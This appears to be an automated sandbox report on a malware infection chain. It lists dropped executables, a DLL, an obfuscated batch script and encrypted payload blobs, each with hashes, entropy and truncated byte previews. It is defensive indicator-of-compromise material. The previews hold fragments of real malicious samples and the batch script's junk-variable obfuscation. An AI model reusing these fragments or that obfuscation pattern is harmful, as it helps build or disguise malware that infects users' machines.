Process:	C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	439296
Entropy (8bit):	6.486801995408641
Encrypted:	false
SSDEEP:	12288:H/RCVy1xtsmUQTXNujba1fM0HRm77vRMmg:ntsouyBM+RmnRLg
MD5:	C07E06E76DE584BCDDD59073A4161DBB
SHA1:	08954AC6F6CF51FD5D9D034060A9AE25A8448971
SHA-256:	CF67A50598EE170E0D8596F4E22F79CF70E1283B013C3E33E36094E1905BA8D9
SHA-512:	E92C9FCD0448591738DAEDB19E8225FF05DA588B48D1F15479EC8AF62ACD3EA52B5D4BA3E3B0675C2AA1705185F5523DCAFDF14137C6E2984588069A2E05309F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........BS..,...,...,.../...,...).#.,..(...,../...,..)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,.........PE..L.....%g..........................................@..........................0............@.................................0E...................................E......8...............................@...............<............................text............................... ..`.rdata..@H.......J..................@..@.data....m...`...,...@..............@....rsrc................l..............@..@.reloc...E.......F...n..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\246122658369

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	81440
Entropy (8bit):	7.741257572477236
Encrypted:	false
SSDEEP:	1536:CTD4bB5b/UPEsQUCSA7SvuCyR2cZZL5KWyyjSrW:mDmzUYoA7UTyoIsE
MD5:	3ED63F96D4AA84666447901D1052551F
SHA1:	0F318AA2BD207772D65FFC0636E6FF85C3291BF6
SHA-256:	7C30D55FFF3359EA31F1D604B99EF5C26657B09C3723467DA096D760849FD684
SHA-512:	7DE1CF7F37A8BFD3E4516A0F650199E7D316197FC621A45D362B345667BBAC9E44B43A6FA5C2C0EBEA7625D6C478DEE4525837F2286E398B1340350B31D3B2D3
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..6o.^.t..ZJ.(...(...(...(...J(...(...(...(...(...(...(...(...(....(...(....(...(...(...(...(...(.i)h......(...(...(...(...(...(...(...J(...(...(...(....(...(....(.......QE..QE..QE......QE...R..(....1F(...(...(.4..b...\RP.E.P.QE..RR..J(...JZLP.E.P.IKF(.(...))i1@..Q@.Gj\RP.R.E......QE...R..(...CKE.%.Q@.6.I..))qI..(...J(...(....1E..QE.%.Q@.%-&(...(.....'....).i(.f.E....(.

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1882624
Entropy (8bit):	7.950763446345506
Encrypted:	false
SSDEEP:	49152:jTMXuoYOokO4Fe2aLaGK8k+LB93WK1yLmSf7:jToY8O4xt38Qeyj
MD5:	62A25F901B0883140D09E62DAAAAEB23
SHA1:	506B6FDF45A694E8D1638B1145C7605BB100202A
SHA-256:	A44C927E4A23DA13388D2BE3A31CCAED8EAD5320D8D6D8CD890F7926E682F8FB
SHA-512:	0230D60C4B5FE58230C5F26D904FDBD84F05078180F4D268EFD52CFBFFDA7355F24812CC20C58EE5933B2E2D0CFAD9E316A620B9AB05B5C107F0B8602C6EED70
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................J...........@...........................J...........@.................................W...k...........................0.J..............................J..................................................... . ............................@....rsrc...............................@....idata ............................@... .`*.........................@...qmypprrr......1.....................@...woialkny......J.....................@....taggant.0....J.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\Beijing

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	ASCII text, with very long lines (1251), with CRLF line terminators
Category:	dropped
Size (bytes):	25056
Entropy (8bit):	5.097145047047532
Encrypted:	false
SSDEEP:	768:zm7k5aS8bpJSQ/QZ8btc/2LgQf4nxr251E8tangG:qk5aKQIWtc/2LgQf4nxrU1HtangG
MD5:	2A84A77AD125A30E442D57C63C18E00E
SHA1:	68567EE0D279087A12374C10A8B7981F401B20B8
SHA-256:	0C6EAD18E99077A5DDE401987A0674B156C07CCF9B7796768DF8E881923E1769
SHA-512:	9D6A720F970F8D24ED4C74BED25C5E21C90191930B0CC7E310C8DD45F6ED7A0B3D9B3ABBD8F0B4979F992C90630D215B1852B3242C5D0A6E7A42ECEF03C0076A
Malicious:	false
Reputation:	unknown
Preview:	Set Cassette=i..xoayWebcam-Hosting-Mel-Yearly-Supposed-Mean-Higher-Necklace-..pxCriterion-Step-Gives-..dPNudist-Institutes-Prompt-Similarly-Ebook-Smoke-Deer-..ClrcHours-Lone-Rubber-Controller-Judges-Permits-Party-..PWCharming-Refer-Accused-..HdBarely-Gay-Outputs-Kelly-Fed-Documentcreatetextnode-Nylon-..oGSubstances-Guidance-Calculated-Saved-Proteins-Stats-Prince-Balloon-..CIInvestigations-Sip-..vICConsider-Assumes-Departure-Jam-Ya-Alloy-Assault-Ur-..Set Lawrence=M..XKuIx-Entitled-Bored-Preserve-Sandwich-..yLMBankruptcy-Render-..GySAnswered-Anaheim-Sword-Driver-Uniprotkb-..RGConstraint-Polo-Jeep-Jpeg-..SLPut-Territory-Point-States-Production-Mag-R-..FlHorizontal-Vote-Villages-Msgid-Lebanon-Bon-Tours-..jpBpAssisted-Furnished-Cubic-..Set Alexander=e..HcgMazda-Eds-Mime-Remark-Description-Und-Mesh-Independently-Tall-..ZtInstructors-Ibm-Str-Drug-..SfVacancies-Qld-Goat-Did-..enRp-Food-Feature-Occupations-..zhJXLaunch-Retained-Gilbert-Administered-Member-..OqStockings-Indeed-Dot-Liver-Maximize

C:\Users\user\AppData\Local\Temp\Beijing.bat

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1251), with CRLF line terminators
Category:	dropped
Size (bytes):	25056
Entropy (8bit):	5.097145047047532
Encrypted:	false
SSDEEP:	768:zm7k5aS8bpJSQ/QZ8btc/2LgQf4nxr251E8tangG:qk5aKQIWtc/2LgQf4nxrU1HtangG
MD5:	2A84A77AD125A30E442D57C63C18E00E
SHA1:	68567EE0D279087A12374C10A8B7981F401B20B8
SHA-256:	0C6EAD18E99077A5DDE401987A0674B156C07CCF9B7796768DF8E881923E1769
SHA-512:	9D6A720F970F8D24ED4C74BED25C5E21C90191930B0CC7E310C8DD45F6ED7A0B3D9B3ABBD8F0B4979F992C90630D215B1852B3242C5D0A6E7A42ECEF03C0076A
Malicious:	false
Reputation:	unknown
Preview:	Set Cassette=i..xoayWebcam-Hosting-Mel-Yearly-Supposed-Mean-Higher-Necklace-..pxCriterion-Step-Gives-..dPNudist-Institutes-Prompt-Similarly-Ebook-Smoke-Deer-..ClrcHours-Lone-Rubber-Controller-Judges-Permits-Party-..PWCharming-Refer-Accused-..HdBarely-Gay-Outputs-Kelly-Fed-Documentcreatetextnode-Nylon-..oGSubstances-Guidance-Calculated-Saved-Proteins-Stats-Prince-Balloon-..CIInvestigations-Sip-..vICConsider-Assumes-Departure-Jam-Ya-Alloy-Assault-Ur-..Set Lawrence=M..XKuIx-Entitled-Bored-Preserve-Sandwich-..yLMBankruptcy-Render-..GySAnswered-Anaheim-Sword-Driver-Uniprotkb-..RGConstraint-Polo-Jeep-Jpeg-..SLPut-Territory-Point-States-Production-Mag-R-..FlHorizontal-Vote-Villages-Msgid-Lebanon-Bon-Tours-..jpBpAssisted-Furnished-Cubic-..Set Alexander=e..HcgMazda-Eds-Mime-Remark-Description-Und-Mesh-Independently-Tall-..ZtInstructors-Ibm-Str-Drug-..SfVacancies-Qld-Goat-Did-..enRp-Food-Feature-Occupations-..zhJXLaunch-Retained-Gilbert-Administered-Member-..OqStockings-Indeed-Dot-Liver-Maximize

C:\Users\user\AppData\Local\Temp\Fitting

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	64218
Entropy (8bit):	7.996758881771081
Encrypted:	true
SSDEEP:	1536:PKwBxCcWt2UqNKZSb5H/U36q/tUJKLT+aYkIR:jYt2/OV/w4RYDR
MD5:	46A51002CDBE912D860CE08C83C0376B
SHA1:	6D0AE63850BD8D5C86E45CBA938609A7F051F59B
SHA-256:	18070C4700DF6609E096F2E79F353844E3E98C9AACCA69919A8BAEB9F9890017
SHA-512:	ED7C8D09E305687DC687AB23F6A83692232677C120836C8F4B876C4DFA867B47E29684E7E1C7973F6C29EEED1B8530B96F609A6111DDE36D94F6657C9B5A4E44
Malicious:	false
Reputation:	unknown
Preview:	$S.v]U.H......;...g.-...4e.xC.W+<7.....FhK.CM..&qCp.....As.L.....>Q....Z..~>k.0..>.....Kh\KD.z%.J....H`S...]8=.CKN........Q..7..1..j...,.Wz.,.............j..<b..d..5a."`.$l......Y..C!>EM.&-.....\...,[$.......HMS..=.=0VBC.?.p......kWp;....-.Ye;...n.A$..2x.I.z....W.....9.Gg..}.....#.J.{.......~.H5.7-.m....p...<...{wJ[_.....W.....&....G....T.:..3q....A...E....e.....w.H..-...i.+..F....Y.FK\|A.9..\..........b....)..?e...6Z...J8.X.rU;..d...V0.v..\|].?[.K1`..{.}q...G..9.....M.........]...v.(.`>&?.l<........\|....V..b\&.s...?.$.a..H.g....v..5..../../J...Z>'J.X5A5.e........$..e.n.v.........#.0Om..r....E.'.zDw.@......,...-....P.....@wA&..5.5...@...d....j?.K..\[,..T.Y...x....7d.gc..^.....:..&r.....q&.x.dh7...d...`W.W.....#p4I.N..,.UK5..y4..k...hS.....gH...1..k....6..X.).#......IT.Y.aN...@...A.K.........H...A.....3^...e..Z.D.x...c..z\.u.8. /_.7?.........O...D.d./@-BEe..G.T......<.ld...CX..zC.ljM$..H.9...#_u..~Z...h.f?.J...-?.....v.0.5 ....l}..=c...*.

C:\Users\user\AppData\Local\Temp\Molecular

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	7.997474648514076
Encrypted:	true
SSDEEP:	1536:OJpwtrTK0Sj35K4+x5Lclh8+c3CXpKUlNzHoaSJIRg77ah30fkD:6+JT7yiYX8z3CZXPHo9KVWkD
MD5:	8CA4BBB4E4DDF045FF547CB2D438615C
SHA1:	3E2FC0FDC0359A08C7782F44A5CCEBF3A52B5152
SHA-256:	4E4BB4AA1F996E96DB8E18E4F2A6576673C00B76126F846BA821B4CD3998AFED
SHA-512:	B45ED05FA6D846C0A38CEFCD5D256FDEE997B9010BC249A34D830953100CA779AB88547353CC8BADAF2908F59FF3A8C780F7CAC189C0F549246FEB504ECB5AF9
Malicious:	false
Reputation:	unknown
Preview:	.....%.i...9.M.a....C.Qv.=.bN.NK..I..Z.J.....mz..?QR."^...1.uO.x.z.=...vo....uE...2..j.K.W.....P..i...........H.^..U.....W.X$.S.6.;..V.1.....~{.....7.o?].....L..$..w.N\`%.D.G..Pp.....g....6.....sA.D.f..\.........F.........U.p...."..{."Ym..`.ne.o.....h9....s...~..pe[{..~.!.......A.#....YL........H...>......w_.5t6....\.bd..C..o<2.y.8-V.Dp..Jg...SH+.@.N0 q.n.M..(..X[...=k...6.._.]}.h..Q.G....l.M.@.JU.K.J....(...XXz......x...E.Gs<]....3.D.%O..)".,...K.Gtt...Y..b.<.S.v...R._......:i.;._.....c]/.N..T.`..+...h.)e............1..v S:..p.u.&.....5.k$...ZS.g....3Ze.....P.....p..H.v.{..q..A..k._.+.g..d.m...v..$....R'_.6r4.......j..XsCxF.....#.0........1.q...P....3C....3].8/(....@...[~.@9E.]..bN_k...."..hF4.T....A^.J.%...p..1{/].....0.3Yw.'.,......X..^1.Z...=&:. .......E....7o..hdz%\.c.qE....&.[F...._.g'.\|.I..;.[A..i.armG..+q......{q.+I&*.\|..A+.......jq.'.J...uR........n.v...;`..8<J.D...r;.... ..D.jE..&.#G.{s6.].-...v..{.....N.l....E..H.......C.Y1.d...

C:\Users\user\AppData\Local\Temp\Mtv

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	7557
Entropy (8bit):	6.206282583817788
Encrypted:	false
SSDEEP:	192:GHAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMlbN+G3X:GHAHhww+/2nlP3r1WAL3X
MD5:	F3D7ABB7A7C91203886DD0F2DF4FC0D6
SHA1:	60FFBB095FCEEB2EA2B9E65355E9DBF1DE736D6C
SHA-256:	5867350B8AD8BB5D83111AED8B296B8C28328BA72B5BEDB0CBEB99B3DC600CB3
SHA-512:	9AF80787C63FA7DE9A22EEA3D1F13D25FF1558ED95321A8178DA734DCE5126F0B7322F13CDDD40C1BC67B65140F684A190DD117247F06600A07DB97B015AA367
Malicious:	false
Reputation:	unknown
Preview:	CRAWFORDFILLEDVERIFYSCALE..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.....................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\See

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	59392
Entropy (8bit):	7.997208571345154
Encrypted:	true
SSDEEP:	1536:WcKhUVngPRVt768UQOH96BBoYRoskvQIevMAVlXaR7ZQRu:EVt760O96BuYODQIev5XaR7ZAu
MD5:	84C831B7996DFC78C7E4902AD97E8179
SHA1:	739C580A19561B6CDE4432A002A502BEA9F32754
SHA-256:	1AC7DB51182A2FC38E7831A67D3FF4E08911E4FCA81A9F2AA0B7C7E393CC2575
SHA-512:	AE8E53499535938352660DB161C768482438F5F6F5AFB632CE7AE2E28D9C547FCF4ED939DD136E17C05ED14711368BDD6F3D4AE2E3F0D78A21790B0955745991
Malicious:	false
Reputation:	unknown
Preview:	...2.v..5.R.w&o(.9.A..B....g.b.'....3,m............Xo#.....}.".....{.......iT8d.g....W...q.?............[..........:r.k.....1....U.X.j(.c.....u..0....%2..[.<..`Bl.(.DW..@...7..P..m.E.......f.o.#c.Q.\|.G....ke[.D.....^!.k..!..i.......".'..g.n.1..{...J..>G..3.[........%....fT\...O.SS..<.I_PF..E..9..t./..."ae..%.Q.wBI..t3../].#.vCQ>U...lx....B74( ........1..g..2l.k.1.X.......fq.5......m.[..oZ.....?....I.UU0n...>..VZ....J..(...).h.9..s...h...M]..t8._.i....d.NQ...Hr..O.R..G.rl.:....h...'.S...U.7.......6.....>.r:..d>.-..........T+...OA; y.Ynj.13w..u.R......{....5.j[..\|.....t1.".)..L..l.=^.Z\.S6......sK.1.0>.....Q....X...O...^7'.....".Es.p.2...g.4....s..U..M'.3x.......jll.{E/...+B.5..=....PD....DH;A,h...7.._.....8....&.k.....>.?....z.g......\|...r..(....l...,...y...<....]....."+..@.s...:.......I]}+..XYm:.\|ns...3...(.gmt..5m.x.....i....<..oF[..1..<...Fv.6.c3.<.^........!WO`..o.....J~w...}....wt.ml....T1.....#".V.o..q...&...f......$.......d.u.9[..

C:\Users\user\AppData\Local\Temp\SfOAQrSBjSOejUhiNHNf.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	312419840
Entropy (8bit):	0.05489297879953657
Encrypted:	false
SSDEEP:	24576:jneR5GB2/lJBYVCcrqgii69vUNitJJvHPXYofmdNiWcn5uEPnmX84ZrA4:j+B1cWgx6TtDYoOKWcnXPmX8O84
MD5:	06767C74EF9BC609B1FDD9F763B821CE
SHA1:	0F43BE5566074C88B2AA1EFA4F1FA7721E43ADC7
SHA-256:	F8B67C5E53668F8FEEAF8622751EE58CE0E234A92301CB8D49A470F0AD970874
SHA-512:	285350597A53E48B223CD2A967BB8781713F345771E3ED2E66FFE0F05EC5F376F0A8111C6E8392CCCF1AD17E376776434B557DD47E45F5A1243BA871D05822C7
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;$g...........#...(..........................Ln.........................@............@... .........................`.......................................@z...........................=.........................t............................text...8...........................`..`.data...............................@....rdata..............................@..@.eh_framX...........................@..@.bss.........p...........................edata..`............:..............@..@.idata...............<..............@....CRT....,............F..............@....tls.................H..............@....reloc..@z.......\|...J..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Spirit

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	81920
Entropy (8bit):	7.997700414089635
Encrypted:	true
SSDEEP:
MD5:	0814E2558C8E63169D393FAC20C668F9
SHA1:	52E8B77554CC098410408668E3D4F127FA02D8BD
SHA-256:	CFDC18B19FE2C0F099FD9F733FE4494AA25B2828D735C226D06C654694FCF96D
SHA-512:	80E70A6EB57DF698FE85D4599645C71678A76340380D880E108B391C922ADADF42721DF5AA994FCFB293AB90E7B04FF3D595736354B93FCB6B5111E90B475319
Malicious:	false
Reputation:	unknown
Preview:	,#.g.'....E.?9..>j.B1.xr...L].k5....<..n3.s1....[3.D...B.5u.1..9f...rS....H..x...[...j[....2...sGH..>q.X+.dT..y.k..K..x.ya..Ra.0.)0.......Q..E}.6Y.'.`.u_.../`l%..\;..=...I..U 7..M@\.v.J.....2...e.r.N..3.L..$.f.S.....OUp.>.%".l_?#.<T%..J...^2.H..=PY(...#MoK...+p...3{8.H...T.^.....i.}Yf..P....k7........QW.E&Vu]j.\.g]3d..U..`K>...u...F.E/S.Qw;..j.d.CWL..0....)?."...lJ.......>....U...8.....]V.......1...(.Y./..=..&7T4Sh.....6..@.....././..qg+./J...7..c.#...^....N./.....9..39.Pt...62.+.....A.y.n!U1...V..<.J.n.^.s..D...k.......4'7.K.T{b...2M.h2.y.2B.ZF.~...........e.lnP..6#..~.v....B.qrh.K.:V^.o...^..}......7..pJ3.s....A.g.T..(..)V..7.y..I.GiC..~......c+.~u..4V!5...1..........b.8....C.,...eV....l:..=k...%.-.....TI.\|.."...!...f)..EV*0.....W71........h.h..&...../.u..c.@.. ..-h...'..].otw_\P..b.Hz....8L8!=-...V.2T...6.T.F&..a\.....Qt......#...b..4.q.$]....F.!HE.....h..P.....:\.r...R...@cd......1.d..8.....H.`v.....=:^.#...p......h#m.g.

C:\Users\user\AppData\Local\Temp\Sponsorship

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	7.9974812887747095
Encrypted:	true
SSDEEP:
MD5:	6785E2E985143A33C5C3557788F12A2B
SHA1:	7A86E94BC7BC10BD8DD54ADE696E10A0AE5B4BF0
SHA-256:	66BBE1741F98DBB750AA82A19BC7B5DC1CDBECF31F0D9DDB03FF7CF489F318C7
SHA-512:	3EDAD611D150C99DBB24A169967CC31E1D3942C3F77B3AF2DE621A6912356400C8003B1C99A7236B6BED65BD136D683414E96C698EABD33D66D7AB231CDFEE91
Malicious:	false
Reputation:	unknown
Preview:	v._.........6..O&.F...\^$..........-.%..xB.D.......".Y.i.O.e. Z..Z.U......,......~..Au..z.3.?..!...6.@.o..< ......D.9......E..Z7:!/.9}c.a.N1.[,8.g jO..[...w.^&A..u..aq..z-H....l..lIx .a...B....^...dP~3...S..V"...3.u..?....{...,o.EZ3..~B.j...."\9..7}l.G.............2....Fh....F\|.LDF+.7....2..."gK ..H.fO[..)......../...X..M...c..FV&S=..W]}..v.].b..P...?{.G.e.g.G..^;s0+.hB....U.LN-..l..G.zn.....t....Y.\.s....9.P..2Y...u{.bd.C..../t<t.."^..3[..........#B.w...5...rH..?.oo..\|.....T..u.\g.......G..%.v.E9c...5sZ;i)...y q_.Gp;...\|t. ........P...`..K.+....f....'..Jz./.....w....6l.c..R..A.N...oM..F.A....F....n.-9M...@:..C.......t..=w.Q....E..>.g{.....Z..dP;...1....rBts3@6.^..RM.Aq;8>.<..Qr.:.c..q.v.Z{...2..E.I.Jm .Q.vIci~kE.i4.......\...85m R...u...,.sE..k........O.0..$.b.5..."!}..,H}.A....{..#x.1>?.Y1..L8}n.p<.V5...]n...v....7.wZ.y.%]G8\|....UX...$.......A.'.T...jf..71..x......(.Y..1..P.h]m.lT..\.....PX.=y_DE7..........a.J.,J.._..d^!..!....O...SA9.W8^...)

C:\Users\user\AppData\Local\Temp\Sweet

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	886078
Entropy (8bit):	6.6221717879410384
Encrypted:	false
SSDEEP:
MD5:	6CEE6BD1B0B8230A1C792A0E8F72F7EB
SHA1:	66A7D26ED56924F31E681C1AF47D6978D1D6E4E8
SHA-256:	08AC328AD30DFC0715F8692B9290D7AC55CE93755C9ACA17F1B787B6E96667AB
SHA-512:	4D78417ACCF1378194E4F58D552A1EA324747BDEC41B3C59A6784EE767F863853EEBAFE2F2BC6315549BDDC4D7DC7CE42C42FF7F383B96AE400CAC8CF4C64193
Malicious:	false
Reputation:	unknown
Preview:	.j.^3.;.~...$xL....98u#h.....[...Y..t..............3..F;.\|...U..V.u.W....t$j.V..\.I.;Gxs..Ot.......t.91u._^]........U..V.u.W....t$j.V..\.I.;Gds..O`.......t.91u._^]........U..QS3....wL.....V3....wL.@...wL.W.....wL...wL...wL....wL...wL....wL....wL..=.wL....wL....wL....wL....wL.....j.^j\|Xf..wL.3....xL.h.I....xL....xL....xL..=.xL... xL.l.I...$xL...(xL...,xL..50xL...4xL.......8xL...<xL...@xL..=DxL..=HxL...\|xL....xL....xL..=.xL.f..wL..2.......~....]..E.. xL.P....Nu._^..wL.[..].V......\|xL.....c....%.xL....8xL.....b....%@xL... xL........xL........wL........wL.....D...^.U...(SVWh.....*...Y....A......^........xL..}..M.9..wL........E...P..xL.......}....xL..].....8..xL.......p....u.........................................E @....#E .E..@......E..E .E..E..}..............}...........u-j..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E..} .uFj..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E ....@.t.j...X.I.j..Y...E .u..E..u.j.j.P....I..u..E.j.SP....I..E.+E.j..5.xL.j..u$P.E.+E.P.u .u.S.u.h..I..u... .I.

C:\Users\user\AppData\Local\Temp\Twisted

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	97280
Entropy (8bit):	7.998072949966149
Encrypted:	true
SSDEEP:
MD5:	BA8C4239470D59C50A35A25B7950187F
SHA1:	855A8F85182DD03F79787147B73AE5ED61FB8D7B
SHA-256:	A6272116DC959A3197A969923F85C000A1388B0A02DF633DEC59B7273BDB421B
SHA-512:	1E6D42C249D206815000CC85D5216D13729246E114647D8CCF174B9BD679530B6B39DFAB2BFCC5D957CC0778A8CF029E544228978682FA285C5E3F9564C2EAF0
Malicious:	false
Reputation:	unknown
Preview:	A@2..3Y.....8p.!..L.[...`..b..f^..J....P@....;.:.."....g...Tz.....T%.R.G.....0$.....n.....r0....R-A..z.N..jK...y.....;.EWs.@b....{....Y9p.)J.....s ;..9.j.........X.K..\|...e..i...`.c..U.h..%...[..b.....n..:Y....M........W>H.....?..O.[......{...7.....C/.!0..\|[&....f.q......}..Q.....+-o.y./T...%..K...vl;4..z."...k:..2[.v.o..{..c5...%...:..kZU1.J?..TI...!...\3_..&L.[{..4..G>..;.%..'...6.q..2....V_.^.....R...g.......<..%.5.j..3.-.o.aj..............j.8aw.6_e}....Z".WLw"S...,....'..6...P.=..xckw}......b..K..h..ad....m{&h...;.o.yR..9.....Q..E.b.....2m..E.r.N..8.u.Q4.m..ht.ck.&f.g...$.....3by..B.V1#.G..y..IL.j......2...\..A..^..T.5....+...W=.Z.[.z....X`.&..z.h...B....\|xs..H&X..Nv..k.5.s.Z...:~9.V.M.PO&.@..m....P.K......".Ju..?.._:%qp.ON..q.....c.AN$N..-MB.q..-.hz.+..O.B.+<~...f..V..5.C"EY..=D..\|.....;.e.\|.g.0.^i..f.._e:...0/.....'.[.........A.1.RY.6}..l.Kf....$.7.N...[ml.W......[.$...p..[H>.+....}.H.....\H2[.'.p......./..z.@...J....-....

C:\Users\user\AppData\Local\Temp\Various

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	7.9982397133011816
Encrypted:	true
SSDEEP:
MD5:	2759C67BCCD900A1689D627F38F0A635
SHA1:	D71B170715ED2B304167545AF2BD42834CCF1881
SHA-256:	510CFD9523A0F8462E8CBDCBBF1AFCCF2AA69A9153472EE48FD28AD4FE06CA05
SHA-512:	AA9E26AD8824ED2CA8BF45C24939E305660CBC19F821A84A7407A16F91D71B2EB9DABA9059D379908F17C9E5A17C0C3E873E5CD7350EE8715E45B2B3EFF2531E
Malicious:	false
Reputation:	unknown
Preview:	5......Z..%D^..\|.....8.6[...8{......ZG.%.80.K[Xd...........56!.>...b9.T.m).mYm.cZ..cy..jC...65.....m+.~.......cl..Ot8..6.t..._=.Q.5..l\.r..>b#.........DU....1... 4.\|k.L.U\......;...D...M^.B...R)D.2...<.T....<GW+..I.....M[...z...k.s..[G].]..d?.o..t._.6h....R.....H..+.uK.i.A..%/..)u..o7%u!x..G.:...jA.F...q......[k....r...u.h.....5_..}Q.;...W.?...Q_......>..x\..dG..;...r......E...R.hq.......X..:..`.j]2s.L...i..)../..q..?..".......h;....')....;...J..l+...7...!.D...g.X.u.......uH..;gj..l.{.~7......\..k.S8...*...O..W.....v..A..C.Bo...z9.2B.."....`.%J Zv.../..I.....WW.l.O..,.@2].if.2....{m.{.i.Q.....j..y....td.}!....".........=.......5..T}0b.....HM.3.f.yA..........-cG..+...G.[`..........DN..".....\|..PU..DOr...lq/..#c....L.......4..6.X.}..KdI.o....;t...DL!.c... ...E..""..@m.m.(E..[]..x.z.......l..........'.......!....t....F......#./........\j...0.A...../a.o..%+..$..[4H.I..;.]:...o+a{Bi.'%C.~...J..^,X6...VNp........:m..e._.U.$.....As2C1<....@G..+.w

C:\Users\user\AppData\Local\Temp\Witch

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	54272
Entropy (8bit):	7.996566915559803
Encrypted:	true
SSDEEP:
MD5:	79156AFDDD310BE36F037A8F0708A794
SHA1:	09EF36AE22B5EAB65D1F62166542601B8919399D
SHA-256:	7FAAF10D09A27842330725E6510D2754487C5B69BD40E11181DD75B03DF61503
SHA-512:	D1449126F2365F607A390E3B6FECB3BE100BFF9FAE1A773CF5815CAB29EEB72AB4E341022BDE9DE653FD62EDE0FB0C26D9010E524D87060AA364BF92A14E9D01
Malicious:	false
Reputation:	unknown
